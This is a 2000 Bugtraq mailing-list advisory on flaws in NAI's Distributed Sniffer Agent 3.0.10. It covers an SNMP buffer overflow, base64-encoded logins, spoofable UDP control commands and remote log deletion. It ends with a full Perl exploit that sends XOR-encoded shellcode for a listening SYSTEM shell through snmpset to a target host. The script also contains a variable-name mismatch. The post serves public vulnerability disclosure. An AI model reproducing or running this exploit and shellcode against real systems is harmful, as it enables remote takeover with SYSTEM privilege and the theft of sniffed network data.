Bugtraq mailing list archives
Remotely exploitable buffer overflow in NAI's Distributed Sniffer Agent
From: Kevin Start <kevin_start () HUSHMAIL COM>
Date: Thu, 2 Nov 2000 15:30:48 -0700
Bugtraq. This 'advisory' details a number of problems with NAI's sniffer product. They have fixed the problems in current versions on the sly so I have foregone notifying the vendor. They saw fit to post an advisory on Microsoft's Netmon today so 'all is fair in love and war' at least MS had the dignity to announce their fixes. As a side note I was working with the vulnhelp team at securityfocus but have decided to just post this given NAI's recent decision to throw rocks in this great glass house.... Date Published: November 2, 2000 Advisory ID: N/A Bugtraq ID: N/A CVE CAN: Non currently assigned. Title: Remotely exploitable buffer overflow and protocol vulnerabilities in NAI's Distributed Sniffer Agent Class: Boundary Error Condition (Buffer Overflow) Remotely Exploitable: Yes Locally Exploitable: Yes Vulnerability Description: NAI's Distributed Sniffer Agent can be overflowed remotely to grant SYSTEM privilege. Additional vulnerabilities exist in the management protocol to allow an attacker to recover logins passwords, take control of the agent, and delete logs. Vulnerable Packages/Systems: Systems running the NAI Sniffer Agent. Tested with Agent version 3.0.10 using Windows NT Workstation 4.0 SP6 Solution/Vendor Information/Workaround: Fixed in current versions. Additionally, advisories and information on security issues of Network Associates roducts can be obtained from: http://www.securityfocus.com/bid/1606 http://www.securityfocus.com/bid/1589 etc, etc, etc, etc. Vendor notified on: Right about now.... Credits: This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp () securityfocus com. Technical Description - Exploit/Concept Code: 1. The most severe problem was an overflow during SNMP writes. NAI elected to use a single community for both public and private access simplifying the process of brute forcing the community string. Once this string has been guessed, shellcode can be written into any accessible object (sysName, for example). The buffer is 256 bytes long with no character restrictions as nulls are allowed when using hex mode as the SNMP encoding. This attack can be launched completely blind with one spoofed UDP packet. SYSTEM privilege can be gained using this method. 2. Authentication was handled using base64 encoded logins and passwords. Dsniff by Dugsong already includes a module for capturing logins and passwords from the agent. Base64 encoding was also used to obfuscate changes to the agent's user database. 3. All remote access to the agent is handled using UDP. Once a user has authenticated to the agent, an attacker can inject his own spoofed commands. Full control of the agent can be gained in this manner. If the packet generation facility was enabled, a packet flood could be initiated. 4. All data transferred from the agent is in cleartext, allowing an attacker to recover data being sniffed on a remote network segment. 5. Flooding the agent with false login requests can cause system instability. A kernel fault was caused during testing. 6. Logs can be deleted remotely, allowing an attacker to delete his own brute forcing attempts once he is successful. --- EXPLOIT --- #!/usr/bin/perl # exploit for NAI Sniffer Agent 3.0.10 # Silently patched in later versions, although customers # were not notified. No workaround was ever released. $xoredport="88 88 "; # (4369) port XORed with 0x99 $egg =" eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2 af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61 90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56 ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0 ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1 06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53 ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab 58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50 57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57 c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47 38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50 50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76 f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57 f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff 57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77 a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff 57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56 53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8 6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7 dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99 de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99 da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7 f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8 f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1 f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0 ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd 99 eb fc fa ef 99 9b 99 $xoredport 99 99 99 99 99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99 ff ff ff ff "; $offset = "00 c7 12 00 "; $snmpset = "/usr/bin/snmpset"; $community = "public"; $objid = "system.sysName.0"; $offcount = 80; $nopcount = 200; @execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg," \""); $host="HOST TO 0WN"; exec ("$snmpset $host $community $objid x @sploitstring");
Current thread:
- Remotely exploitable buffer overflow in NAI's Distributed Sniffer Agent Kevin Start (Nov 03)